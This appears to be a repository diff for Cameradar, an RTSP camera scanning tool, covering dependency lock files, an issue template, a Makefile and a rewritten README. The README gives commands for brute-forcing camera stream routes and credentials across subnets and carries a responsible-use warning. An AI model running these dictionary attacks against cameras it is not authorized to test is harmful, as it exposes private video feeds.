pruneopts = "UT"
|
||||
revision = "c2353362d570a7bfa228149c62842019201cfb71"
|
||||
version = "v1.8.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:c658e84ad3916da105a761660dcaeb01e63416c8ec7bc62256a9b411a05fcd67"
|
||||
name = "github.com/mattn/go-colorable"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "167de6bfdfba052fa6b2d3664c8f5272e23c9072"
|
||||
version = "v0.0.9"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:0981502f9816113c9c8c4ac301583841855c8cf4da8c72f696b3ebedf6d0e4e5"
|
||||
name = "github.com/mattn/go-isatty"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "6ca4dbf54d38eea1a992b3c722a76a5d1c4cb25c"
|
||||
version = "v0.0.4"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:53bc4cd4914cd7cd52139990d5170d6dc99067ae31c56530621b18b35fc30318"
|
||||
name = "github.com/mitchellh/mapstructure"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "3536a929edddb9a5b34bd6861dc4a9647cb459fe"
|
||||
version = "v1.1.2"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:95741de3af260a92cc5c7f3f3061e85273f5a81b5db20d4bd68da74bd521675e"
|
||||
name = "github.com/pelletier/go-toml"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "c01d1270ff3e442a8a57cddc1c92dc1138598194"
|
||||
version = "v1.2.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:40e195917a951a8bf867cd05de2a46aaf1806c50cf92eebf4c16f78cd196f747"
|
||||
name = "github.com/pkg/errors"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "645ef00459ed84a119197bfb8d8205042c6df63d"
|
||||
version = "v0.8.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:0028cb19b2e4c3112225cd871870f2d9cf49b9b4276531f03438a88e94be86fe"
|
||||
name = "github.com/pmezard/go-difflib"
|
||||
packages = ["difflib"]
|
||||
pruneopts = "UT"
|
||||
revision = "792786c7400a136282c1664665ae0a8db921c6c2"
|
||||
version = "v1.0.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:d707dbc1330c0ed177d4642d6ae102d5e2c847ebd0eb84562d0dc4f024531cfc"
|
||||
name = "github.com/spf13/afero"
|
||||
packages = [
|
||||
".",
|
||||
"mem",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "a5d6946387efe7d64d09dcba68cdd523dc1273a3"
|
||||
version = "v1.2.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:08d65904057412fc0270fc4812a1c90c594186819243160dc779a402d4b6d0bc"
|
||||
name = "github.com/spf13/cast"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "8c9545af88b134710ab1cd196795e7f2388358d7"
|
||||
version = "v1.3.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:68ea4e23713989dc20b1bded5d9da2c5f9be14ff9885beef481848edd18c26cb"
|
||||
name = "github.com/spf13/jwalterweatherman"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "4a4406e478ca629068e7768fc33f3f044173c0a6"
|
||||
version = "v1.0.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:c1b1102241e7f645bc8e0c22ae352e8f0dc6484b6cb4d132fa9f24174e0119e2"
|
||||
name = "github.com/spf13/pflag"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "298182f68c66c05229eb03ac171abe6e309ee79a"
|
||||
version = "v1.0.3"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:de37e343c64582d7026bf8ab6ac5b22a72eac54f3a57020db31524affed9f423"
|
||||
name = "github.com/spf13/viper"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "6d33b5a963d922d182c91e8a1c88d81fd150cfd4"
|
||||
version = "v1.3.1"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:ac83cf90d08b63ad5f7e020ef480d319ae890c208f8524622a2f3136e2686b02"
|
||||
name = "github.com/stretchr/objx"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "477a77ecc69700c7cdeb1fa9e129548e1c1c393c"
|
||||
version = "v0.1.1"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:15a4a7e5afac3cea801fa24831fce3bf3b5bd3620cbf8355a07b7dbf06877883"
|
||||
name = "github.com/stretchr/testify"
|
||||
packages = [
|
||||
"assert",
|
||||
"mock",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "f35b8ab0b5a2cef36673838d662e249dd9c94686"
|
||||
version = "v1.2.2"
|
||||
|
||||
[[projects]]
|
||||
branch = "master"
|
||||
digest = "1:38f553aff0273ad6f367cb0a0f8b6eecbaef8dc6cb8b50e57b6a81c1d5b1e332"
|
||||
name = "golang.org/x/crypto"
|
||||
packages = ["ssh/terminal"]
|
||||
pruneopts = "UT"
|
||||
revision = "505ab145d0a99da450461ae2c1a9f6cd10d1f447"
|
||||
|
||||
[[projects]]
|
||||
branch = "master"
|
||||
digest = "1:3d5e79e10549fd9119cbefd614b6d351ef5bd0be2f2b103a4199788e784cbc68"
|
||||
name = "golang.org/x/sys"
|
||||
packages = [
|
||||
"unix",
|
||||
"windows",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "b4a75ba826a64a70990f11a225237acd6ef35c9f"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:8029e9743749d4be5bc9f7d42ea1659471767860f0cdc34d37c3111bd308a295"
|
||||
name = "golang.org/x/text"
|
||||
packages = [
|
||||
"internal/gen",
|
||||
"internal/triegen",
|
||||
"internal/ucd",
|
||||
"transform",
|
||||
"unicode/cldr",
|
||||
"unicode/norm",
|
||||
]
|
||||
pruneopts = "UT"
|
||||
revision = "f21a4dfb5e38f5895301dc265a8def02365cc3d0"
|
||||
version = "v0.3.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:8abc978192c2fca4d6a74260c3a8f4aa34d25bd3c548c938745b91b8b20cda1d"
|
||||
name = "gopkg.in/go-playground/validator.v9"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "0277b12d53df79c9dbf7311cb07fa9c81ed621bb"
|
||||
version = "v9.24.0"
|
||||
|
||||
[[projects]]
|
||||
digest = "1:4d2e5a73dc1500038e504a8d78b986630e3626dc027bc030ba5c75da257cdb96"
|
||||
name = "gopkg.in/yaml.v2"
|
||||
packages = ["."]
|
||||
pruneopts = "UT"
|
||||
revision = "51d6538a90f86fe93ac480b35f37b2be17fef232"
|
||||
version = "v2.2.2"
|
||||
|
||||
[solve-meta]
|
||||
analyzer-name = "dep"
|
||||
analyzer-version = 1
|
||||
input-imports = [
|
||||
"github.com/Ullaakut/cameradar",
|
||||
"github.com/Ullaakut/nmap",
|
||||
"github.com/andelf/go-curl",
|
||||
"github.com/fatih/color",
|
||||
"github.com/gernest/wow",
|
||||
"github.com/gernest/wow/spin",
|
||||
"github.com/pkg/errors",
|
||||
"github.com/spf13/pflag",
|
||||
"github.com/spf13/viper",
|
||||
"github.com/stretchr/testify/assert",
|
||||
"github.com/stretchr/testify/mock",
|
||||
"gopkg.in/go-playground/validator.v9",
|
||||
]
|
||||
solver-name = "gps-cdcl"
|
||||
solver-version = 1
|
||||
-54
@@ -1,54 +0,0 @@
|
||||
# Gopkg.toml example
|
||||
#
|
||||
# Refer to https://golang.github.io/dep/docs/Gopkg.toml.html
|
||||
# for detailed Gopkg.toml documentation.
|
||||
#
|
||||
# required = ["github.com/user/thing/cmd/thing"]
|
||||
# ignored = ["github.com/user/project/pkgX", "bitbucket.org/user/project/pkgA/pkgY"]
|
||||
#
|
||||
# [[constraint]]
|
||||
# name = "github.com/user/project"
|
||||
# version = "1.0.0"
|
||||
#
|
||||
# [[constraint]]
|
||||
# name = "github.com/user/project2"
|
||||
# branch = "dev"
|
||||
# source = "github.com/myfork/project2"
|
||||
#
|
||||
# [[override]]
|
||||
# name = "github.com/x/y"
|
||||
# version = "2.4.0"
|
||||
#
|
||||
# [prune]
|
||||
# non-go = false
|
||||
# go-tests = true
|
||||
# unused-packages = true
|
||||
|
||||
|
||||
[[constraint]]
|
||||
branch = "master"
|
||||
name = "github.com/andelf/go-curl"
|
||||
|
||||
[[constraint]]
|
||||
name = "github.com/fatih/color"
|
||||
version = "1.7.0"
|
||||
|
||||
[[constraint]]
|
||||
branch = "master"
|
||||
name = "github.com/gernest/wow"
|
||||
|
||||
[[constraint]]
|
||||
name = "github.com/spf13/pflag"
|
||||
version = "1.0.3"
|
||||
|
||||
[[constraint]]
|
||||
name = "github.com/spf13/viper"
|
||||
version = "1.3.1"
|
||||
|
||||
[[constraint]]
|
||||
name = "github.com/stretchr/testify"
|
||||
version = "1.2.2"
|
||||
|
||||
[prune]
|
||||
go-tests = true
|
||||
unused-packages = true
|
||||
@@ -1,51 +0,0 @@
|
||||
First, make sure that none of the open and closed issues is about the same issue as you are describing, and make sure to check the frequently asked questions in the README file.
|
||||
Then, replace the parts of this template that are between <angle brackets> with the data relative to your issue.
|
||||
|
||||
**If you're reporting a bug, use the template below. Otherwise, delete this template and write your issue normally.**
|
||||
|
||||
## Context
|
||||
|
||||
Please select one:
|
||||
|
||||
- [ ] I use the docker image `ullaakut/cameradar`
|
||||
- [ ] I use my own build of the docker image
|
||||
- [ ] I use the pre-compiled binary
|
||||
- [ ] I use my own build of the binary
|
||||
- [ ] None of the above / I don't know
|
||||
|
||||
Please select one:
|
||||
|
||||
- [ ] I use a specific version: <version tag>
|
||||
- [ ] I use the latest commit of the master branch
|
||||
- [ ] I use the latest commit of the develop branch
|
||||
- [ ] I use a forked version of the repository: <fork URL>
|
||||
- [ ] I use a specific commit: <commit hash>
|
||||
|
||||
## Environment
|
||||
|
||||
My operating system:
|
||||
- [ ] Windows
|
||||
- [ ] OSX
|
||||
- [ ] Linux
|
||||
- [ ] Other
|
||||
|
||||
OS version: <version>
|
||||
OS architecture: <architecture>
|
||||
|
||||
## Issue
|
||||
|
||||
### What was expected?
|
||||
|
||||
<expected behavior>
|
||||
|
||||
### What happened?
|
||||
|
||||
<observed behavior>
|
||||
|
||||
### Logs
|
||||
|
||||
If your issue is with Cameradar's binary or docker image, please run it with `-l` to print logs, and paste them here:
|
||||
|
||||
```
|
||||
<cameradar logs>
|
||||
```
|
||||
@@ -0,0 +1,28 @@
|
||||
# set this e.g. via `make build GORELEASER_FLAGS="--skip=docker"` for temporary flags
|
||||
GORELEASER_FLAGS=
|
||||
|
||||
#Format
|
||||
|
||||
fmt:
|
||||
@echo "==> Formatting source"
|
||||
@gofmt -s -w $(shell find . -type f -name '*.go')
|
||||
@echo "==> Done"
|
||||
.PHONY: fmt
|
||||
|
||||
#Test
|
||||
|
||||
test:
|
||||
@go test -cover -race ./...
|
||||
.PHONY: test
|
||||
|
||||
#Lint
|
||||
|
||||
lint:
|
||||
@golangci-lint run --config=.golangci.yml ./...
|
||||
.PHONY: lint
|
||||
|
||||
#Build
|
||||
|
||||
build:
|
||||
@goreleaser release $(GORELEASER_FLAGS) --clean --snapshot
|
||||
.PHONY: build
|
||||
@@ -1,8 +1,4 @@
|
||||
# Cameradar
|
||||
|
||||
<p align="center">
|
||||
<img src="https://raw.githubusercontent.com/Ullaakut/cameradar/master/images/Cameradar.gif" width="100%"/>
|
||||
</p>
|
||||
## Cameradar
|
||||
|
||||
<p align="center">
|
||||
<a href="#license">
|
||||
@@ -11,175 +7,262 @@
|
||||
<a href="https://hub.docker.com/r/ullaakut/cameradar/">
|
||||
<img src="https://img.shields.io/docker/pulls/ullaakut/cameradar.svg?style=flat" />
|
||||
</a>
|
||||
<a href="https://travis-ci.org/Ullaakut/cameradar">
|
||||
<img src="https://travis-ci.org/Ullaakut/cameradar.svg?branch=master" />
|
||||
<a href="https://github.com/Ullaakut/cameradar/actions">
|
||||
<img src="https://img.shields.io/github/actions/workflow/status/Ullaakut/cameradar/build.yaml" />
|
||||
</a>
|
||||
<a href='https://coveralls.io/github/Ullaakut/cameradar?branch=master'>
|
||||
<img src='https://coveralls.io/repos/github/Ullaakut/cameradar/badge.svg?branch=master' alt='Coverage Status' />
|
||||
</a>
|
||||
<a href="https://golangci.com/r/github.com/Ullaakut/cameradar">
|
||||
<img src="https://golangci.com/badges/github.com/Ullaakut/cameradar.svg" />
|
||||
<a href="https://goreportcard.com/report/github.com/ullaakut/cameradar">
|
||||
<img src="https://goreportcard.com/badge/github.com/ullaakut/cameradar" />
|
||||
</a>
|
||||
<a href="https://goreportcard.com/report/github.com/Ullaakut/cameradar">
|
||||
<img src="https://goreportcard.com/badge/github.com/Ullaakut/cameradar" />
|
||||
</a>
|
||||
<a href="https://github.com/Ullaakut/cameradar/releases/latest">
|
||||
<a href="https://github.com/ullaakut/cameradar/releases/latest">
|
||||
<img src="https://img.shields.io/github/release/Ullaakut/cameradar.svg?style=flat" />
|
||||
</a>
|
||||
<a href="https://godoc.org/github.com/Ullaakut/cameradar">
|
||||
<img src="https://godoc.org/github.com/Ullaakut/cameradar?status.svg" />
|
||||
<a href="https://pkg.go.dev/github.com/ullaakut/cameradar">
|
||||
<img src="https://godoc.org/github.com/ullaakut/cameradar?status.svg" />
|
||||
</a>
|
||||
</p>
|
||||
|
||||
## An RTSP stream access tool that comes with its library
|
||||
## RTSP stream access tool
|
||||
|
||||
### Cameradar allows you to
|
||||
Cameradar scans RTSP endpoints on authorized targets, and uses dictionary attacks to bruteforce their credentials and routes.
|
||||
|
||||
* **Detect open RTSP hosts** on any accessible target host
|
||||
* Detect which device model is streaming
|
||||
* Launch automated dictionary attacks to get their **stream route** (e.g.: `/live.sdp`)
|
||||
* Launch automated dictionary attacks to get the **username and password** of the cameras
|
||||
* Retrieve a complete and user-friendly report of the results
|
||||
### What Cameradar does
|
||||
|
||||
<p align="center"><img src="https://raw.githubusercontent.com/Ullaakut/cameradar/master/images/Cameradar.png" width="250"/></p>
|
||||
- Detects open RTSP hosts on accessible targets.
|
||||
- Detects the device model that streams the RTSP feed.
|
||||
- Attempts dictionary-based discovery of stream routes (for example, `/live.sdp`).
|
||||
- Attempts dictionary-based discovery of camera credentials.
|
||||
- Produces a report of findings.
|
||||
|
||||
## Table of content
|
||||
<p align="center"><img src="images/Cameradar.png" width="250"/></p>
|
||||
|
||||
* [Docker Image](#docker-image)
|
||||
* [Configuration](#configuration)
|
||||
* [Output](#output)
|
||||
* [Check camera access](#check-camera-access)
|
||||
* [Command line options](#command-line-options)
|
||||
* [Contribution](#contribution)
|
||||
* [Frequently Asked Questions](#frequently-asked-questions)
|
||||
* [License](#license)
|
||||
## Table of contents
|
||||
|
||||
## Docker Image for Cameradar
|
||||
- [Quick start with Docker](#quick-start-with-docker)
|
||||
- [Install the binary](#install-the-binary)
|
||||
- [Install on Android (Termux)](#install-on-android-termux)
|
||||
- [Configuration](#configuration)
|
||||
- [Security and responsible use](#security-and-responsible-use)
|
||||
- [Output](#output)
|
||||
- [Check camera access](#check-camera-access)
|
||||
- [Command-line options](#command-line-options)
|
||||
- [Input file format](#input-file-format)
|
||||
- [Environment variables](#environment-variables)
|
||||
- [Build and contribute](#build-and-contribute)
|
||||
- [Frequently asked questions](#frequently-asked-questions)
|
||||
- [Examples](#examples)
|
||||
- [License](#license)
|
||||
|
||||
Install [docker](https://docs.docker.com/engine/installation/) on your machine, and run the following command:
|
||||
---
|
||||
|
||||
<p align="center"><img src="images/example.gif"/></p>
|
||||
|
||||
## Quick start with Docker
|
||||
|
||||
Install [Docker](https://docs.docker.com/engine/installation/) and run:
|
||||
|
||||
```bash
|
||||
docker run -t ullaakut/cameradar -t <target> <other command-line options>
|
||||
docker run --rm -t --net=host ullaakut/cameradar --targets <target>
|
||||
```
|
||||
|
||||
[See command-line options](#command-line-options).
|
||||
Example:
|
||||
|
||||
e.g.: `docker run -t ullaakut/cameradar -t 192.168.100.0/24 -l` will scan the ports 554, 5554 and 8554 of hosts on the 192.168.100.0/24 subnetwork and attack the discovered RTSP streams and will output debug logs.
|
||||
```bash
|
||||
docker run --rm -t --net=host ullaakut/cameradar --targets 192.168.100.0/24
|
||||
```
|
||||
|
||||
* `YOUR_TARGET` can be a subnet (e.g.: `172.16.100.0/24`), an IP (e.g.: `172.16.100.10`), or a range of IPs (e.g.: `172.16.100.10-20`).
|
||||
* If you want to get the precise results of the nmap scan in the form of an XML file, you can add `-v /your/path:/tmp/cameradar_scan.xml` to the docker run command, before `ullaakut/cameradar`.
|
||||
* If you use the `-r` and `-c` options to specify your custom dictionaries, make sure to also use a volume to add them to the docker container. Example: `docker run -t -v /path/to/dictionaries/:/tmp/ ullaakut/cameradar -r /tmp/myroutes -c /tmp/mycredentials.json -t mytarget`
|
||||
This scans ports 554, 5554, and 8554 on the target subnet.
|
||||
It attempts to enumerate RTSP streams.
|
||||
For all options, see [command-line options](#command-line-options).
|
||||
|
||||
## Installing the binary on your machine
|
||||
- Targets can be CIDRs, IPs, IP ranges or a hostname.
|
||||
- Subnet: `172.16.100.0/24`
|
||||
- IP: `172.16.100.10`
|
||||
- Host: `localhost`
|
||||
- Range: `172.16.100.10-20`
|
||||
|
||||
Only use this solution if for some reason using docker is not an option for you or if you want to locally build Cameradar on your machine.
|
||||
- To use custom dictionaries, mount them and pass both flags:
|
||||
|
||||
```bash
|
||||
docker run --rm -t --net=host \
|
||||
-v /path/to/dictionaries:/tmp/dictionaries \
|
||||
ullaakut/cameradar \
|
||||
--custom-routes /tmp/dictionaries/my_routes \
|
||||
--custom-credentials /tmp/dictionaries/my_credentials.json \
|
||||
--targets 192.168.100.0/24
|
||||
```
|
||||
|
||||
## Install the binary
|
||||
|
||||
Use this option if Docker is not available or if you want a local build.
|
||||
|
||||
### Dependencies
|
||||
|
||||
* `go`
|
||||
* `dep`
|
||||
- Go 1.25 or later
|
||||
|
||||
#### Installing dep
|
||||
### Steps
|
||||
|
||||
* OSX: `brew install dep` and `brew upgrade dep`
|
||||
* Others: Download the release package for your OS [here](https://github.com/golang/dep/releases)
|
||||
1. `go install github.com/Ullaakut/cameradar/v6/cmd/cameradar@latest`
|
||||
|
||||
### Steps to install
|
||||
The `cameradar` binary is now in your `$GOPATH/bin`.
|
||||
For available flags, see [command-line options](#command-line-options).
|
||||
|
||||
Make sure you installed the dependencies mentionned above.
|
||||
## Install on Android (Termux)
|
||||
|
||||
1. `go get github.com/Ullaakut/cameradar`
|
||||
2. `cd $GOPATH/src/github.com/Ullaakut/cameradar`
|
||||
3. `dep ensure`
|
||||
4. `cd cameradar`
|
||||
5. `go install`
|
||||
These steps summarize a working Termux setup for Android.
|
||||
Use Termux 117 from F-Droid or the official Termux site, not Google Play.
|
||||
|
||||
The `cameradar` binary is now in your `$GOPATH/bin` ready to be used. See command line options [here](#command-line-options).
|
||||
### 1) Set up Termux and Alpine
|
||||
|
||||
## Library
|
||||
Install the required packages in Termux:
|
||||
|
||||
### Dependencies of the library
|
||||
```bash
|
||||
pkg update
|
||||
pkg install mc wget git nmap proot-distro
|
||||
```
|
||||
|
||||
* `curl-dev` / `libcurl` (depending on your OS)
|
||||
* `nmap`
|
||||
* `github.com/pkg/errors`
|
||||
* `gopkg.in/go-playground/validator.v9`
|
||||
* `github.com/andelf/go-curl`
|
||||
Install Alpine and log in:
|
||||
|
||||
#### Installing the library
|
||||
```bash
|
||||
proot-distro install alpine
|
||||
proot-distro login alpine
|
||||
```
|
||||
|
||||
`go get github.com/Ullaakut/cameradar`
|
||||
### 2) Install build tools in Alpine
|
||||
|
||||
After this command, the _cameradar_ library is ready to use. Its source will be in:
|
||||
```bash
|
||||
apk add wget git go gcc clang musl-dev make
|
||||
```
|
||||
|
||||
$GOPATH/src/pkg/github.com/Ullaakut/cameradar
|
||||
### 3) Build Cameradar
|
||||
|
||||
You can use `go get -u` to update the package.
|
||||
Create a module path and clone the repo:
|
||||
|
||||
Here is an overview of the exposed functions of this library:
|
||||
```bash
|
||||
mkdir -p go/pkg/mod/github.com/Ullaakut
|
||||
cd go/pkg/mod/github.com/Ullaakut
|
||||
git clone https://github.com/Ullaakut/cameradar.git
|
||||
cd cameradar/cmd/cameradar
|
||||
go install
|
||||
```
|
||||
|
||||
#### Discovery
|
||||
### 4) Run Cameradar
|
||||
|
||||
You can use the cameradar library for simple discovery purposes if you don't need to access the cameras but just to be aware of their existence.
|
||||
Copy dictionaries and run the binary:
|
||||
|
||||
<p align="center"><img width="90%" src="https://raw.githubusercontent.com/Ullaakut/cameradar/master/images/NmapPresets.png"/></p>
|
||||
This describes the nmap time presets. You can pass a value between 1 and 5 as described in this table, to the NmapRun function.
|
||||
```bash
|
||||
mkdir -p /tmp
|
||||
cp -r ../../dictionaries /tmp/dictionaries
|
||||
/go/bin/cameradar --targets=<target> --custom-credentials=/tmp/dictionaries/credentials.json --custom-routes=/tmp/dictionaries/routes --ui=plain --debug
|
||||
```
|
||||
|
||||
#### Attack
|
||||
|
||||
If you already know which hosts and ports you want to attack, you can also skip the discovery part and use directly the attack functions. The attack functions also take a timeout value as a parameter.
|
||||
|
||||
#### Data models
|
||||
|
||||
Here are the different data models useful to use the exposed functions of the cameradar library.
|
||||
|
||||
<p align="center"><img width="60%" src="https://raw.githubusercontent.com/Ullaakut/cameradar/master/images/Models.png"/></p>
|
||||
|
||||
#### Dictionary loaders
|
||||
|
||||
The cameradar library also provides two functions that take file paths as inputs and return the appropriate data models filled.
|
||||
Replace `<target>` with an IP, range, host or subnet you are authorized to test.
|
||||
|
||||
## Configuration
|
||||
|
||||
The **RTSP port used for most cameras is 554**, so you should probably specify 554 as one of the ports you scan. Not specifying any ports to the cameradar application will scan the 554, 5554 and 8554 ports.
|
||||
The default RTSP ports are `554`, `5554`, `8554`.
|
||||
If you do not specify ports, Cameradar uses those.
|
||||
|
||||
`docker run -t --net=host ullaakut/cameradar -p "18554,19000-19010" -t localhost` will scan the ports 18554, and the range of ports between 19000 and 19010 on localhost.
|
||||
|
||||
You **can use your own files for the ids and routes dictionaries** used to attack the cameras, but the Cameradar repository already gives you a good base that works with most cameras, in the `/dictionaries` folder.
|
||||
Example of scanning custom ports:
|
||||
|
||||
```bash
|
||||
docker run -t -v /my/folder/with/dictionaries:/tmp/dictionaries \
|
||||
ullaakut/cameradar \
|
||||
-r "/tmp/dictionaries/my_routes" \
|
||||
-c "/tmp/dictionaries/my_credentials.json" \
|
||||
-t 172.19.124.0/24
|
||||
docker run --rm -t --net=host \
|
||||
ullaakut/cameradar \
|
||||
--ports "18554,19000-19010" \
|
||||
--targets localhost
|
||||
```
|
||||
|
||||
This will put the contents of your folder containing dictionaries in the docker image and will use it for the dictionary attack instead of the default dictionaries provided in the cameradar repo.
|
||||
You can replace the default dictionaries with your own routes and credentials files.
|
||||
The repository provides baseline dictionaries in the `dictionaries` folder.
|
||||
|
||||
```bash
|
||||
docker run --rm -t --net=host \
|
||||
-v /my/folder/with/dictionaries:/tmp/dictionaries \
|
||||
ullaakut/cameradar \
|
||||
--custom-routes /tmp/dictionaries/my_routes \
|
||||
--custom-credentials /tmp/dictionaries/my_credentials.json \
|
||||
--targets 172.19.124.0/24
|
||||
```
|
||||
|
||||
### Skip discovery with `--skip-scan`
|
||||
|
||||
If you already know the RTSP endpoints, you can skip discovery and treat each
|
||||
target and port as a stream candidate. This mode does not run discovery and can be
|
||||
useful on restricted networks or when you want to attack a known inventory.
|
||||
|
||||
Skipping discovery means:
|
||||
|
||||
- Cameradar does not run discovery and does not detect device models.
|
||||
- Targets resolve to IP addresses. Hostnames resolve via DNS.
|
||||
- CIDR blocks and IPv4 ranges expand to every address in the range.
|
||||
- Large ranges create many targets, so use them carefully.
|
||||
|
||||
Example:
|
||||
|
||||
```bash
|
||||
docker run --rm -t --net=host \
|
||||
ullaakut/cameradar \
|
||||
--skip-scan \
|
||||
--ports "554,8554" \
|
||||
--targets 192.168.1.10
|
||||
```
|
||||
|
||||
In this example, Cameradar attempts dictionary attacks against
|
||||
ports 554 and 8554 of `192.168.1.10`.
|
||||
|
||||
### Choose the discovery scanner with `--scanner`
|
||||
|
||||
Cameradar supports two discovery backends:
|
||||
|
||||
- `nmap` (default)
|
||||
- `masscan`
|
||||
|
||||
Use `nmap` when you want more reliable RTSP discovery: it performs service
|
||||
identification and can better distinguish RTSP from other open ports.
|
||||
|
||||
Use `masscan` when scanning very large networks: it is generally faster and
|
||||
more efficient at scale, but it does not provide service discovery.
|
||||
|
||||
```bash
|
||||
docker run --rm -t --net=host \
|
||||
ullaakut/cameradar \
|
||||
--scanner masscan \
|
||||
--ports "554,8554" \
|
||||
--targets 192.168.1.0/24
|
||||
```
|
||||
|
||||
> [!WARNING]
|
||||
> `--scan-speed` only applies to the `nmap` scanner.
|
||||
|
||||
## Security and responsible use
|
||||
|
||||
Cameradar is a penetration testing tool.
|
||||
Only scan networks and devices you own or have explicit permission to test.
|
||||
Do not use this tool to access unauthorized systems or streams.
|
||||
If you are unsure, stop and get written approval before scanning.
|
||||
|
||||
## Output
|
||||
|
||||
Cameradar presents results in a readable terminal UI.
|
||||
It logs findings to the console.
|
||||
The report includes discovered hosts, identified device models, and valid routes or credentials.
|
||||
If you specify a path for the `--output` flag, Cameradar also writes an M3U playlist with the discovered streams.
|
||||
|
||||
## Check camera access
|
||||
|
||||
If you have [VLC Media Player](http://www.videolan.org/vlc/), you should be able to use the GUI or the command-line to connect to the RTSP stream using this format : `rtsp://username:password@address:port/route`
|
||||
Use [VLC Media Player](http://www.videolan.org/vlc/) to connect to a stream:
|
||||
|
||||
With the above result, the RTSP URL would be `rtsp://admin:12345@173.16.100.45:554/live.sdp`
|
||||
`rtsp://username:password@address:port/route`
|
||||
|
||||
## Command line options
|
||||
## Input file format
|
||||
|
||||
* **"-t, --targets"**: Set target. Required. Target can be a file (see [instructions on how to format the file](#format-input-file)), an IP, an IP range, a subnetwork, or a combination of those. Example: `--targets="192.168.1.72,192.168.1.74"`
|
||||
* **"-p, --ports"**: (Default: `554,5554,8554`) Set custom ports.
|
||||
* **"-s, --speed"**: (Default: `4`) Set custom nmap discovery presets to improve speed or accuracy. It's recommended to lower it if you are attempting to scan an unstable and slow network, or to increase it if on a very performant and reliable network. You might also want to keep it low to keep your discovery stealthy. See [this for more info on the nmap timing templates](https://nmap.org/book/man-performance.html).
|
||||
* **"-T, --timeout"**: (Default: `2000`) Set custom timeout value in miliseconds after which an attack attempt without an answer should give up. It's recommended to increase it when attempting to scan unstable and slow networks or to decrease it on very performant and reliable networks.
|
||||
* **"-r, --custom-routes"**: (Default: `<CAMERADAR_GOPATH>/dictionaries/routes`) Set custom dictionary path for routes
|
||||
* **"-c, --custom-credentials"**: (Default: `<CAMERADAR_GOPATH>/dictionaries/credentials.json`) Set custom dictionary path for credentials
|
||||
* **"-o, --nmap-output"**: (Default: `/tmp/cameradar_scan.xml`) Set custom nmap output path
|
||||
* **"-l, --log"**: Enable debug logs (nmap requests, curl describe requests, etc.)
|
||||
* **"-h"** : Display the usage information
|
||||
The file can contain IPs, hostnames, IP ranges, and subnets.
|
||||
Separate entries with newlines.
|
||||
Example:
|
||||
|
||||
## Format input file
|
||||
|
||||
The file can contain IPs, hostnames, IP ranges and subnetwork, separated by newlines. Example:
|
||||
|
||||
```go
|
||||
```text
|
||||
0.0.0.0
|
||||
localhost
|
||||
192.17.0.0/16
|
||||
@@ -187,11 +270,15 @@ localhost
|
||||
192.168.2-3.0-255
|
||||
```
|
||||
|
||||
## Environment Variables
|
||||
When you use `--skip-scan`, Cameradar expands each entry into explicit IP
|
||||
addresses before building the target list.
|
||||
|
||||
### `CAMERADAR_TARGET`
|
||||
## Options
|
||||
|
||||
This variable is mandatory and specifies the target that cameradar should scan and attempt to access RTSP streams on.
|
||||
### `TARGETS` / `--targets` / `-t`
|
||||
|
||||
This variable is required.
|
||||
It specifies the target that Cameradar scans and attempts to access.
|
||||
|
||||
Examples:
|
||||
|
||||
@@ -201,131 +288,182 @@ Examples:
|
||||
* `192.168.1.140-255`
|
||||
* `192.168.2-3.0-255`
|
||||
|
||||
### `CAMERADAR_PORTS`
|
||||
### `PORTS` / `--ports` / `-p`
|
||||
|
||||
This variable is optional and allows you to specify the ports on which to run the scans.
|
||||
This variable is optional and allows you to specify the ports to scan.
|
||||
|
||||
Default value: `554,5554,8554`
|
||||
|
||||
It is recommended not to change these except if you are certain that cameras have been configured to stream RTSP over a different port. 99.9% of cameras are streaming on these ports.
|
||||
Change these only if you are sure cameras stream over different ports.
|
||||
Most cameras use these defaults.
|
||||
|
||||
### `CAMERADAR_NMAP_OUTPUT_FILE`
|
||||
### `CUSTOM_ROUTES` / `--custom-routes` / `-r`
|
||||
|
||||
This variable is optional and allows you to specify on which file nmap will write its output.
|
||||
This option is optional.
|
||||
It replaces the default routes dictionary used for the dictionary attack.
|
||||
|
||||
Default value: `/tmp/cameradar_scan.xml`
|
||||
If unset, Cameradar uses the built-in routes dictionary.
|
||||
|
||||
This can be useful only if you want to read the files yourself, if you don't want it to write in your `/tmp` folder, or if you want to use only the RunNmap function in cameradar, and do its parsing manually.
|
||||
### `CUSTOM_CREDENTIALS` / `--custom-credentials` / `-c`
|
||||
|
||||
### `CAMERADAR_CUSTOM_ROUTES`, `CAMERADAR_CUSTOM_CREDENTIALS`
|
||||
This option is optional.
|
||||
It replaces the default credentials dictionary used for the dictionary attack.
|
||||
|
||||
These variables are optional, allowing to replace the default dictionaries with custom ones, for the dictionary attack.
|
||||
If unset, Cameradar uses the built-in credentials dictionary.
|
||||
|
||||
Default values: `<CAMERADAR_GOPATH>/dictionaries/routes` and `<CAMERADAR_GOPATH>/dictionaries/credentials.json`
|
||||
